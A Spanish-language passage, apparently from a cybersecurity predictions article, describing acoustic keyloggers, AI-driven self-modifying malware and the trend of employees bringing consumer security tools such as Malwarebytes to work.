Los ataques diseñados para evitar la detección, como los registradores de sonido, se deslizarán en la naturaleza. Los registradores de teclas que graban sonidos a veces se denominan registradores de sonido, y pueden escuchar la cadencia y el volumen del toque para determinar qué teclas se tocan en un teclado. Ya en existencia, este tipo de ataque fue desarrollado por actores del estado nación para atacar a los adversarios. Es probable que los ataques que utilizan esta y otras nuevas metodologías de ataque diseñadas para evitar la detección se deslicen contra las empresas y el público en general.
La inteligencia artificial se usará en la creación de ejecutables maliciosos. Si bien la idea de tener AI maliciosa ejecutándose en el sistema de una víctima es pura ciencia ficción, al menos durante los próximos 10 años, el malware modificado por, creado por, y la comunicación con un AI es Una realidad peligrosa . Una IA que se comunica con computadoras comprometidas y monitorea qué y cómo se detecta cierto malware puede implementar rápidamente contramedidas. Los controladores AI habilitarán el malware creado para modificar su propio código para evitar que se detecte en el sistema, independientemente de la herramienta de seguridad implementada. Imagine una infección de malware que actúa casi como «The Borg» de Star Trek, ajustando y aclimatando sus métodos de ataque y defensa sobre la marcha en función de lo que se enfrenta.
Traiga su propia seguridad crece a medida que disminuye la confianza. Cada vez más consumidores llevan su propia seguridad al lugar de trabajo como primer o segundo nivel de defensa para proteger su información personal. Malwarebytes recientemente realizó una investigación global y descubrió que cerca de 200,000 compañías tenían instalada una versión para el consumidor de Malwarebytes. La educación fue la industria más propensa a adoptar BYOS, seguida del software / tecnología y los servicios empresariales.